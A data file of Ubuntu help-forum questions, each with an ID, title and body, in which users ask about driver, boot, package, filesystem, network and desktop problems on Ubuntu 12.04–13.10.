431149	how to reload nvidia driver , ( nvidia optimus/multiscreen : how to restart optirun after hibernation/suspend )	i use the following scripts to initialize multiscreen setup : # ! /bin/bash # initializes nvidia optimus for multi-screen functionality . sudo modprobe bbswitch optirun true intel-virtual-output but when my machine suspends , it goes back to a single screen . i try to restart by terminating and initializating again . i terminate with the following : sudo kill -15 $ xorg_process sudo rmmod nvidia sudo tee /proc/acpi/bbswitch < < < off then i run the initialize script again , but i get the following message : [ 16929.676769 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) server terminated successfully ( 0 ) . closing log file . [ 16929.676811 ] [ error ] aborting because fallback start is disabled . manual testing indicates that this error comes from the optirun true command in the initialize script . is there a way i can reload my second screen after my machine hibernates ? ( or , more specifically , how to reload the nvidia driver ? ) i am referencing the solution to the optimus multiscreen monitor issue ( for machines with outputs hard-wired to the discrete gpu ) found here .
431150	ubuntu 12.04 apt directory corrupted	i have recently installed ubuntu 12.04 on my old hp dv6646us laptop . i was trying to install jdk7 ( java development kit 7 ) on it and tried many things . long story short , i think i corrupted the /var/cache/apt directory . software center is now not working . i am running windows vista and ubuntu 12.04 on this machine as dual boot . here is the output of an ls -l on the /var/cache/apt directory jmk @ ubuntu : /var/cache/apt $ ls -l ls : can not access srcpkgcache.bin : input/output error total 4 drwxr-xr-x 3 root root 4096 mar 6 21:57 archives - ? ? ? ? ? ? ? ? ? ? ? ? ? ? srcpkgcache.bin as you can see srcpkgcache.bin is messed up . i am completely new to ubuntu and i did try this : sudo rm /var/lib/apt/lists/* -vf and then sudo apt-get update but that did not work . is there anyway to get this fixed without re-installing ubuntu ?
431152	no space left on left on drive after deleting everything . /dev/sda6 100 % used	i had recently run a script in our college exam on my computer which was specifically for 32bit ( i386 ) but my ubuntu is amd64 , so the script would n't run but then i tried accessing the folders in my home folder which gave me permission denied . so i did a sudo chmod 777 -r /home/username , which gave me permissions to complete the test even though i was put as an exception to take my test without using the script to run successfully . after all this and another two days later i started facing problems of less space on my drive but i probably should have had plenty of space . then it said that i have 1.4 kb space left on the system . i searched for my problem on the net and somewhere i found an answer on askubuntu which i am not able to find again . it said that , what actually happened is that the home directory should have 644 permission rather than 777 and so the files i deleted had their inodes still present along with the new files i added to the directory and hence there is no space left . i have removed everything from the home directory and when i try to add a file with size less than a kb it still says no space left . any help or suggestions will be appreciated . running df gives filesystem 1k-blocks used available use % mounted on /dev/sda6 16229452 15634864 0 100 % / udev 1941220 4 1941216 1 % /dev tmpfs 780000 972 779028 1 % /run none 5120 0 5120 0 % /run/lock none 1949996 9732 1940264 1 % /run/shm overflow 1024 668 356 66 % /tmp /dev/sda3 449082364 281834708 167247656 63 % /media/acer /dev/sdb1 976762524 250648068 726114456 26 % /media/hd-pctu2 df -h filesystem size used avail use % mounted on /dev/sda6 16g 15g 0 100 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 762m 972k 761m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 14m 1.9g 1 % /run/shm overflow 1.0m 668k 356k 66 % /tmp /dev/sda3 429g 269g 160g 63 % /media/acer /dev/sdb1 932g 240g 693g 26 % /media/hd-pctu2 gparted image i.imgur.com/nk0u349.png
431156	getting a global menu on xubuntu 13.10	how do i get a true global menu on xubuntu or ubuntu/gnome 3 classic 13.10 ? i do n't want the unity autohiding menu , just a horizontal global menu that lives in a toolbar on top of the screen . i know there was a ppa for an old version of ubuntu , but i 'm looking for a solution that will work on 13.10 .
431157	unable to install nvidia binaries for zotac gt640 on 13.10	i installed 13.10 using liveusb and it automatically installed 'nouveau ' for me . i 'd like to install the binaries to get my gt640 working fully . however , when i try to use the proprietary driver manager , even after updating sources and running apt-get update/upgrade , it says no proprietary drivers detected . my graphics card shows up in system information as gallium 0.4 on nve7 and does n't show up as a gt640 . i tried installing the nvidia binaries from their website , however i ran into an error saying that i had nouveau installed already . i uninstalled nouveau , but the binaries still would n't install and upon reboot , my computer was completely unresponsive . i ended up wiping and reinstalling ubuntu . i then installed 'nvidia-current ' . after rebooting , my computer emits a loud beep on boot and does n't show anything . control+alt+f1 does nothing but elicit another loud beep . i 'm stumped and do n't know enough to figure out what i 'm doing wrong . please help ! thank you for your time and consideration .
431158	partitions mouted as read only , problem with fstab file	this is my fstab file after my experiment with it . proc /proc proc nodev , noexec , nosuid 0 0 uuid=140bf3f9-51f1-4894-8aa8-0682f2faccaf / ext4 errors=remount-ro 0 1 uuid=f908bcb0-d211-49ac-9980-45822fece574 none swap users , sw , user 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sda5 /media/sda5 ntfs nls=iso8859-1 , users , user 0 0 /dev/sdb1 /media/sdb1 vfat users , user 0 0 /dev/sda3 /media/sda3 ntfs nls=iso8859-1 , users , umask=000 , user 0 0 /dev/sda4 /media/sda4 ntfs nls=iso8859-1 , users , user 0 0 /dev/sda6 /media/sda6 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/sda7 /media/sda7 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/sda8 /media/sda8 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/sda1 /media/classics ntfs nls=iso8859-1 , group , users , umask=000 , gid=users , user , uid=root 0 0 now my partitions mount as read only . there is some problem with sdb1 also , every time i have to press s to boot . please help me to edit fstab to its default state .
431162	make the menu keyboard key act as a right mouse click in unity	what : i have a keyboard key called `` menu '' that does successfully pull up a menu , but it does n't correspond with where the mouse pointer currently is . rather , it is a menu relative to what seems to be position zero ( 0,0 ) in whatever ui object is considered active / last selected . for example , if firefox is open and i click the menu key with the mouse over a misspelled word , but have n't clicked anywhere after switching back to firefox from another application , the menu shows up in the left top corner with no contextual information . i want it always tied to the mouse/cursor location . why : i have a laptop with a barely working left click ( the mouse moves when clicked so it takes about 5 tries per successful left click ) . i did see this , but am not sure if there is maybe just a unity setting to make it work , etc . how do i bind right click to a keyboard shortcut ?
431165	count number of characters/words/lines in libreoffice/openoffice ( using terminal )	the command wc which is used for counting does n't work directly with office files . for example i created a writer .odt file and i wrote inside 7 words . then i tried wc -w file.odt the output was 136 which is non logic at all . if you try the above on any file you can just wc -w without problems . now my question is how to use wc command with libre/openoffice ?
431172	install ubuntu touch emulator in ubuntu 12.04	i want to install ubuntu-touch emulator on my ubuntu 12.04 64bit desktop edition . how could i do that ?
431175	image file size exceeds 700 mb	i downloaded an ubuntu image file , but its size is 30 mb more than a cd can hold . also , my computer can not boot through a dvd or usb drive ; what should i do ? please help !
431180	hdmi audio output problem not resolved , tried everything	i love ubuntu , but this problem is really a big deal for me ! i cant hear audio over my hdmi connection , i have video , but no audio . i have an asus k52dr with ubuntu 12.04 and an ati mobility radeon hd 5470 series now , when i go to the basic sound settings , under output , i have no hdmi option to select , even though it is connected , just internal speakers i tried the pulseaudio volume controller fix , and it did show that i have an hdmi option in there , it is called `` cedar hdmi audio [ radeon hd 5400/6000 series ] digital stereo hdmi '' but when i choose it as my default output device it still will not play through the tv speakers ; even though my laptops internal speakers will turn off and it will show the decibels supposedly being pumped to my tv . does anyone have any other fixes for this ? i would love to get my ubuntu back up to tip top performance again
431181	how do i get a complete list of files in my hard drive in a convenient format ?	my hard drive is about to fail and i 'm about to get a new one . most of my files are not really personal and is mostly downloaded off from the internet . so as a countermeasure , i wanted to get a complete list of files in my hard drive that is easy to search through in case the hard drive failed earlier ( so that i can re-download it later on ) . thanks in advance .
431185	how do i install ubuntu 13.10 on a hp 15-g020ca with windows 8.1	i have a hp 15-g020ca with windows 8.1 preinstalled and i dont know to install ubuntu . i have put ubuntu 13.10 on 2 other laptops both with a similar bios to eachother but the hp bios on this motherboard is a bit odd from what i do know about computers
431188	wepcrackgui , scan dos n't detect wep networks	well i have wepcrackgui , and when it scans for networks , it only detects wpa networks , and not the wep , and i tried something , i changed the scan method from aircrack , to wpa supplicant , and it started to detect both wep , and wpa , and i got a good 80 % signal , but the test injection button , dos n't appeared , and i changed the scan method again to airocrack , and nothing , i tried to reinstall aircrack again , and nothing i ve done this before with no problems , but now , specially yesteday , i opened wepcrackgui , and , it detected wep networks , i selected one , and `` test injection '' , and the network dissappeared , and there is where my problem started , what the problem could be ?
431190	wifi network connection detection takes too long time in ubuntu 12.10	internet connection detection in my wifi network ( using desktop computer ) takes too long time , after upgrading from ubuntu 12.04 to 12.10 . i have only basic knowledge in ubuntu.so please help me by providing step by step explanations to establish a quicker network connection ?
431193	how can i gain permission to upload photos from a macintosh hd drive , an online cloud service	i used ubuntu to recover files before , bit this time i 'm stumped . my sisters mac book pro has a bad hard drive its 500gb . i boot ubuntu through a flash drive , and i did not install it i 'm using the feature to `` try ubuntu '' using the code : `` gksu nautilus '' i 'm able to view the pictures she wants save before we send it to apple . the only problem is when i 'm trying to upload it to drop-box or google drive it wo n't go . if i try to drag and drop it , nothing happens . when i try to navigate to it `` you do n't have permission '' . is there a way for me to get permission ? the pictures are in the directory `` /media/macontosh hd/users/mysistersname/pictures '' but she needs the iphote pictures that goes deeper to `` /media/macontosh hd/users/mysistersname/pictures/iphoto/masters/ i tried to zip it but it ends up with errors , or not enough space . thank you , for any help .
431197	boot after install and boot-repair to black screen	i have a black screen after fresh a install of ubuntu 12.04 . i installed ubuntu from the terminal after booting from a live usb stick , not from the boot menu . i 'm getting some halting script lines displayed after ctrl+alt+f2 when the power button is pressed . i did boot-repair from the usb stick and got the same thing . the live usb image works fine . it just wo n't boot from the hard drive . here is my boot-repair log . partially fixed : used boot-repair to set boot option acpi=off . now ubuntu 12.04 boots normally . the recovery mode still has a similar problem .
431208	xubuntu unknown rate limiting	i recently replaced an ubuntu install with xubuntu , and then added on a few of the things i had previously , like samba . i noticed when i was installing vnstat that it was saying my max bandwidth on eth0 would be 100 mbits . it should be 1 gbit . the computer has a 1g interface and is attached the a 1g switch . according the ethtools , the xubuntu network manager , and the light on my switch , it is connected in 1000base-t mode . then i tried a bandwidth test by copying files over samba from a laptop with a 1 gbit card and by creating a truecrypt volume . windows task manager shows only 10 % network usage . i 've tried removing vnstat just in case . my old ubuntu install correctly transferred at 1000 mbits/s . anyone know what could be causing this change ? tl ; dr computer connected at 1000 mbit/s is only transferring at 100 mbit/s . looking for help . thanks edit : i just tried disconnecting the ethernet cable and plugging it into a different port on my computer ( i have 3 ) and was able to get samba transfer speeds at about 1 gbit/s .
431212	stuck in low graphics resoultion	i have an nvidia geforce 7300gt graphics card . ubuntu installed automatic graphics driver which is shown as vesa : g73 board - p345h0b . now i am stuck in low grahpics mode . can anyone help me ?
431219	setting up a virtual com port	finally my dell xps 13 has arrived . i was aware of this shortcoming when i bought it , however , now i wish to resolve it . my question . in ubuntu 12.04 can i establish a vcp so that i 'm able to receive serial data from my current projects . ( ie pic , rpi etc ) . as i only have two usb ports i would like to 've able to turn this facility on/off . thanks in advance
431221	can not unset http_proxy	i have xubuntu and i ca n't unset the http_proxy variable . and i want to unset it because i ca n't downloading now . i try to do unset http_proxy or export http_proxy=
431224	ctrl+alt+f* is not working	i have ubuntu 12.04 installed on virtual box in dell inspiron n5110 . i have this problem from couple of weeks and did not get resolved yet after couple of searches . pressing ctrl+alt+f ( * ) does not get me to a console . i am newbie . how do i get this resolved ?
431229	anyone know why compiz is n't working ?	so the other day i was able to use compiz just fine now its not showing up in the dash app search > so i removed it reinstalled it still it 's a no show ... i 'm using ubuntu version 12.10 and i need help thanx in advance ... ok so i tried to run it from the terminal and got this.. bill @ computer : ~ $ compiz compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - error : screen 0 on display `` :0 '' already has a window manager ; try using the -- replace option to replace the current window manager . compiz ( core ) - info : stopping plugin : core compiz ( core ) - info : unloading plugin : core bill @ computer : ~ $
431235	what is a kernel and how do i remove unused kernels ?	i have ubuntu 12.04 lts . i am new to ubuntu and i get this warning that 0 bytes are remaining on the volume /boot . i asked a question : this is the link to it so i got replies saying i should remove unused kernels . can anyone explain to me in simple language what is a kernel and how do i remove unused kernels . thank you : )
431241	sound card is not working on ubuntu kernel version 3.11.0-12	from the /var/log/syslog file , the kernel stack trace . mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.384971 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385030 ] warning : cpu : 0 pid : 954 at /build/buildd/linux-3.11.0/drivers/gpu/drm/i915/intel_display.c:3869 intel_modeset_check_state+0x75c/0x770 [ i915 ] ( ) mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385034 ] wrong connector dpms state mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385038 ] modules linked in : michael_mic ( f ) arc4 ( f ) nls_utf8 isofs ( f ) parport_pc ( f ) ppdev ( f ) rfcomm bnep bluetooth coretemp gpio_ich joydev ( f ) dell_wmi sparse_keymap snd_hda_codec_idt snd_hda_codec_hdmi dell_laptop dcdbas uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev snd_hda_intel snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) microcode ( f ) snd_rawmidi ( f ) psmouse ( f ) serio_raw ( f ) lib80211_crypt_tkip r592 r852 sm_common nand nand_ecc nand_bch memstick wl ( pof ) snd_seq ( f ) lpc_ich nand_ids bch ( f ) mtd lib80211 cfg80211 snd_seq_device ( f ) snd_timer ( f ) snd ( f ) soundcore ( f ) mac_hid i915 wmi drm_kms_helper drm video ( f ) i2c_algo_bit lp ( f ) parport ( f ) sdhci_pci firewire_ohci sdhci firewire_core crc_itu_t ( f ) sky2 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385143 ] cpu : 0 pid : 954 comm : xorg tainted : pf w o 3.11.0-12-generic # 19-ubuntu mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385147 ] hardware name : dell inc. inspiron 1525 /0u990c , bios a11 03/10/2008 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385151 ] 0000000000000009 ffff8800aeddd9b8 ffffffff816e547a ffff8800aeddda00 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385159 ] ffff8800aeddd9f0 ffffffff81061dbd ffff8800b962e800 ffff8800ba747800 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385166 ] ffff8800b90bb800 ffff8800b90bbc60 ffff8800aee1bc00 ffff8800aeddda50 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385174 ] call trace : mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385187 ] [ < ffffffff816e547a > ] dump_stack+0x45/0x56 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385197 ] [ < ffffffff81061dbd > ] warn_slowpath_common+0x7d/0xa0 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385204 ] [ < ffffffff81061e2c > ] warn_slowpath_fmt+0x4c/0x50 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385242 ] [ < ffffffffa011d08c > ] intel_modeset_check_state+0x75c/0x770 [ i915 ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385274 ] [ < ffffffffa011d135 > ] intel_set_mode+0x25/0x30 [ i915 ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385307 ] [ < ffffffffa011e2f3 > ] intel_get_load_detect_pipe+0x253/0x410 [ i915 ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385346 ] [ < ffffffffa013f470 > ] intel_tv_detect+0x100/0x490 [ i915 ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385363 ] [ < ffffffffa00dd953 > ] drm_helper_probe_single_connector_modes+0x1d3/0x380 [ drm_kms_helper ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385394 ] [ < ffffffffa0088226 > ] drm_mode_getconnector+0x3e6/0x440 [ drm ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385416 ] [ < ffffffffa0079212 > ] drm_ioctl+0x532/0x660 [ drm ] mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385426 ] [ < ffffffff810721e2 > ] ? __set_task_blocked+0x32/0x70 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385437 ] [ < ffffffff811b8ba5 > ] do_vfs_ioctl+0x2e5/0x4d0 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385445 ] [ < ffffffff811b8e11 > ] sys_ioctl+0x81/0xa0 mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385452 ] [ < ffffffff816f521d > ] system_call_fastpath+0x1a/0x1f mar 8 13:03:20 rjk-inspiron-1525 kernel : [ 1931.385457 ] -- - [ end trace f52cca908b37197a ] -- -
431242	how to add the shutdown options to the unity	how to add the options : shutdown reboot logout suspend hibernate lock screen to the unity dash as shown in the picture below .
431244	black screen after login ( nvidia driver installation )	i have an nvidia geforce 740m graphics card and an intel core i5-3337u 1.8ghz processor in my asus k56c laptop . i know this issue has happened to many others , but i tried all the solutions i could find and not single one worked for me . so i tried to install nvidia driver from additional drivers , and after installation and reboot i login and my screen goes black with only the mouse visible . i read some different solutions , but nothing seems to work ! solutions i tried which did n't work , there is still a black screen after login : â installing nvidia gt 740m driver on ubuntu 13.10 get black screen after login ! â blank screen after installing nvidia restricted driver and some others , but none seems to work , and at this point all i want is anything just so my driver works and i can again use ubuntu ! i also tried manually downloading the driver from the nvidia website and installing it , but i had the same problem .
431245	connection shared via wifi authentication problem on android	i 'm trying to connect my android device ( galaxy nexus with android 4.3 ) to internet via my 3g network that i use on my ubuntu 12.04 i followed this post on ubuntu forums . installation and configuration were straightforward and i 'm getting wifi signal on my galaxy like that should be . but one problem appears . first it get connected , but then it displays a message 'authentication problem ' then try to connect again , connect and disconnect with the message above . i used an iphone to check if the problem come from my galaxy , but the same message appears 'connection failed , authentication problem' i also tried hostapd method , like this explained here , but i have the same problem . does any one have a clue to solve this issue ? thanks for your time .
431246	ca n't update because of `` untrusted '' packages ?	so i 'm trying to apply a boatload of updates and upgrades via ubuntu 's built-in update system ... but it tells me the updates/upgrades ca n't be completed because it requires the installation of `` untrusted '' packages . for the most part , my software has been installed via the ubuntu software center ... but there are a few odds and ends that i have installed separately ... the thing is , even the `` ubuntu base '' updates ( which as i understand it , as from ubuntu themselves ) are considered `` untrusted '' when i try to install them individually ! i 've had a play around in the relevant settings , but no matter what i click , ubuntu simply does not want to apply these updates/upgrades ! what am i doing wrong ?
431251	how to print the directory tree in terminal	what is the command that can be used to draw the directory tree inside the terminal emulator ?
431262	how do i share my mobile internet connection via wifi in ubuntu 12.04	newbie here . i am trying to use share my 3g mobile internet connection but do n't know how to do this . any working ideas on how to do this ?
431270	where did /usr/lib/x11/xorg.conf.d/10-synaptics.conf go ?	on my macbook i can only move the cursor while also pressing the touchpad after a default install . a per login session fix is to run `` synclient fingerlow=10 '' and `` synclient fingerhigh=20 '' . in order to make this change permanent i 'm supposed to do add the following in the tochpad section of /usr/lib/x11/xorg.conf.d/10-synaptics.conf . but i do not have this file . section `` inputclass '' identifier `` touchpad catchall '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' driver `` synaptics '' option `` fingerlow '' `` 10 '' option `` fingerhigh '' `` 20 '' endsection where do i need to apply this change ?
431274	inconsistent parent directory of all symlinks	a large portion of my system depends on symbolic links , so this is a very serious problem . i do something like the following cd mkdir test mkdir other cd test ln -s ../other/ # so ~/test contains a symlink to ~/other cd other dirname `pwd` # so far so good ; prints /home/user/test ls .. # prints the contents of /home/user ( ? ? ? ) cd .. # now we 're back in /home/user/test so the parent of the current working directory and .. refer to two different locations in the context of ls ( and also cp ) , but not cd . i have observed this problem for all symlinks on my system , both existing and new ( like the example above ) , and on multiple filesystems . the same thing happens in nautilus , which now shows the breadcrumbs of the physical path of any symlink i click , instead of the relative path . to my knowledge , i did not change anything that would cause an error like this , and booting an old kernel did not appear to fix the problem . i have seen many posts desiring this behavior , but none correcting it . any thoughts on this issue would be greatly appreciated . i am running ubuntu linux 12.10 3.11.0-18-generic .
431275	the android libraries to ubuntu system	hello how can i add the android libraries to ubuntu system , in order to run android applications without the use of the emulator
431276	gnome input source switching - i can only switch once using shortcuts ?	i have gnome installed on ubuntu 13.10 , and i enables several input methods ( japanese anthy , korean hangeul and chinese pinyin ) in addition to my english ( us ) keyboard . i set the shortcut to ctrl+space , then super+space , then alt+shift and multiple other combinations , however , whenever i use these shortcuts to attempt to cycle through my input methods , it only goes to the next one and stops . for example , if i ctrl+space from english ( us ) to japanese ( anthy ) , i can not press ctrl+space to change further . i am stuck at japanese ( anthy ) until i let go of ctrl+space and repeat . however , clicking on the input method icon and changing still works for all input methods . does anyone know what the problem might be ? to clarify again , i am using gnome 's input sources from system settings . update : the latest system updates have solved this problem . update2 : i have checked and realized that the problem exists in gnome but not in gnome classic . update2b : after further experimentation , i have found that the problem sometimes exists and sometimes does n't exist , and does n't depend on whether it is in gnome or gnome classic . logging out and in usually solves the problem .
431277	i have a problem with mergelist and package update manager in 13.10	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % % 5fus , e : the package lists or status file could not be parsed or opened .
431278	no install ubuntu 13.10 alongside windows 8 option available in the installer . why is that ?	i am trying to install ubuntu alongside win8 on my laptop , though i ca n't . for some reason it wo n't give me the option . i have used a guide i have found here to remove gpt structures with gdisk and i did , and now gdisk only finds mbr structures , but i still wo n't get the option . i have 3 partitions , and 50gigs of unallocated space . what can be the problem ? : s thanks !
431282	why i am getting this error while updating the system ?	w : gpg error : http : //deb.opera.com stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey e585066a30c18a2b why i am getting this error and how to solve this error ?
431283	vpn : vpn connect throught another program ?	i just downloaded the gta sa.. and it works fine with the sa : mp 0.3z rc2 , but i have a big problem . there is a server which uses a secondary client . i can make it to work with crossover its works great , but one thing : the secondary client uses vpn but it ca n't connet . i think it uses some ports , that blocked on ubuntu 12.04 . any idea ?
431284	xfreerdp upgrade to version 1.1 to support multi monitor	i was trying to use freerdp with support for multiple monitor using ubuntu 13.10 x64 i get error : root @ rdp-client : ~ # xfreerdp /multimon /f /u : a /p:1 /v:192.168.0.140:3389 transport_connect : getaddrinfo ( name or service not known ) error : protocol security negotition failure my version of freerdp 1.0.2 how i can upgrade to xfreerdp version 1.1 to support this syntax of command and multi monitor can someone help me please thanks
431287	ca n't start ubuntu after updating video card drivers	i have an nvidia geforce gt 645 . i installed ubuntu 13.04 without issue , but was unable to launch steam . i tried switching the driver inside the software & updates screen , but no matter which selection i made , the result was the same . steam would n't run . i followed instructions i found on the internet and ran the following : sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings all completed without error . upon rebooting , ubuntu displays an error message pop-up window . there are a few options , but no matter what i pick , nothing seems to happen . one option is to continue in low-res mode , but if i select it , nothing happens . it also says i can revert to an old configuration , but when i select that option , it brings me to the same screen . it does n't seem to actually do anything . i 'm able to get online using the ubuntu install usb ... but i 'm afraid i 'm in over my head . i do n't want to reinstall because i 've spent a good ~10 hours or so getting things to work , i do n't care if i ca n't run steam games . can anyone help me revert back the video card driver ?
431290	some keyboard shortcuts suddenly stopped working	after installing some regular updates , the volume up , down , and mute keyboard shortcuts have suddenly stopped working for me . i had set these to ctrl+up , ctrl+down , and ctrl+m respectively . i even tried changing these keyboard shortcuts but that did n't work either . it seems like the whole function has stopped working altogether . please help .
431293	gksu naulitus is not working	i am using ubuntu 12.04 . i wanted to change permissions of a file so i typed gksu naulitus . it asked my password andstl i entered it and nothing happened . what should i do ?
431296	should i move /bin and /lib folders that 's inside a program to /usr/local/ ?	i 've downloaded intellij idea ide from their website . i 've putted it inside /usr/local/bin and then configured my path var and the program work correctly . the program folder has these two folders inside it , bin and lib . i know that if i moved their content to my /usr/local/bin and /usr/local/lib/ the program will work . however , it will be a problem to remove it later because i wo n't be able to distinguish its files from what was already there inside /usr/local/bin and /usr/local/lib/ . i know that software centre doesnât keep them in folders but it sprat them to /usr/bun /usr/lib and other folders . so my question is in what way should i organize these type of programs ?
431297	ubuntu touch emulator not working	i decided to try out ubuntu touch using the ubuntu-emulator to see if i like it . eventually i will use this to make and test ubuntu apps . i ran these commands to install , create and run ubuntu-emulator : sudo apt-get install ubuntu-emulator sudo ubuntu-emulator create myinstance ubuntu-emulator run myinstance the first two worked fine and when i ran the third , a virtual phone appeared however the virtual screen was blank . i waited and waited , but nothing happened , the screen remained blank/black ( on the virtual phone ) . then i notice i have to log in terminal . i entered phablet then phablet and logged in fine . now i have the terminal logged in and a virtual kernel of the phone but the screen is blank . how can i start the graphics ? also , once i 've got the screen working , can i reduce the window size ( it does n't all fit on one desktop ) ?
431299	video driver related problems 13.10 ?	i have installed 13.10 64bits version on an i7 laptop with a 610m radeon graphic card . i have also installed flash player i have a few problems . youtube plays only with huge black areas above and below so the video is very stretched . i have a blinking cursor and when i type , the cursor springs so the typing is going on at a different place ( very annoying ) . from the sleeping position back it asks for a password even after i disabled this . text is always red underlined ( dutch download and dutch langauge ) i have read that its possible that 13.10 does not support 610m external video card . and that i have to use 12.04 is this true ? i have already tried to download and use the driver from the nvidea site but it gives a error
431302	13.10 : partial upgrade created held broken packages	after the last upgrade yesterday some weird things happened . the update uninstalled netflix-desktop , wine and playonlinux and i have not being able to install them again from the terminal nor the software center or aptitude . i 've dived into each forum and debian guide but the problem is still there . in one of those `` autoremove '' and `` autoclean '' , even the unity desktop was uninstalled and had to install it again . these are the things i 've tried , and did n't work at all : sudo apt-get clean sudo apt-get autoremove sudo apt-get -f install sudo apt-get install -- fix-broken sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade sudo dpkg -- configure -a ... all of the above did n't fix the problem . when i run the command to see the packages on `` hold '' , nothing comes up . i 'm suspecting that there is something very `` broken '' with the wine dependencies , as when i use synaptics , it give me also an error message and shows no unmet dependencies . here is the error : e : unable to correct problems , you have held broken packages . e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i 've also tried to install one by one the dependencies , but i get errors and once i saw a loop ( deadlock ) . now , here are my questions : is there a way to fix this without reinstalling ubuntu ? how can i manually purge or clean any mixed solitary wine installation ? is there a way to refresh ubuntu to a clean install to clear the dependancy tree ? i 'm suspecting that some dependency might be `` dirty '' between versions ( netflix-desktop uses 1.5 , i 've tried to install 1.6 , 1.7 , and 1.4 )
431304	lost the notification bar and the launcher 12.10	so the last thing i cchanged was i type in compiz -- replace ... . the first wierd thing was the icon for dash on the launcher dissapeared then after coming out of blank screen stanby my bar at the top was gone and so was my launcher ? ... any ideas ?
431306	lenovo mute led light reversed . ubuntu 12.04	i run ubuntu 12.04 on a lenovo g560 . my led buttons for mute/volume up down work fine . the problem is the mute led option is reversed - in other words , when i mute my laptop the light activates , when i unmute it deactivates . it should be the other way around . a weak ago i had ubuntu 13.10 having the same issue . after some time though , i guess as a result of some apps i 've installed the issue got fixed . installed pretty much everything in 12.04 too but issue is still present . i tried the aslamixer but it does not provide option for led mode . there must be some file to edit so as to reverse the led effect . id appreciate if you help me find what !
431307	ubuntu 12.04.4 ext4 filesystem , excessive overhead	i 'm experiencing a baffling problem with two 12.04.4 servers i 've just installed - there is what appears to be excessive file system overhead for anything i save on its folders ; for example , a single 4120-byte text file results in 1.1mb used space ( as reported via du -h ) ; if i add another file of roughly the same size , the used space rises to 2.1mb , and so forth . this is the result of running tune2fs on the affected partition : tune2fs 1.42 ( 29-nov-2011 ) filesystem volume name : < none > last mounted on : / filesystem uuid : 1ff9c84f-e11b-4b55-8b68-1451cc68f05e filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : user_xattr acl filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 60899328 block count : 243594240 reserved block count : 12179712 free blocks : 239168340 free inodes : 60749233 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 965 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : thu mar 6 11:35:56 2014 last mount time : fri mar 7 12:30:16 2014 last write time : thu mar 6 11:49:02 2014 mount count : 6 maximum mount count : -1 last checked : thu mar 6 11:35:56 2014 check interval : 0 ( < none > ) lifetime writes : 12 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : d22a76e0-2480-4607-805f-d7710cbb8dbd journal backup : inode blocks can anyone explain what could be causing this ?
431308	recover data from lost partition after install ubuntu	i have a 500gb hdd . when i install ubuntu i was made a mistake that i install ubuntu by replacing windows 7. after installation ubuntu run fine . but my hdd have only one part ion of whole 500gb . now how can i get my previous data from this hdd ? thanks in advance .
431309	disk utility in ubuntu desktop	how can i go to disk utility in order to rename the hdd partitions ? i am trying ubuntu 12.04 from usb . disk utility is shown as installed but i ca n't access it .
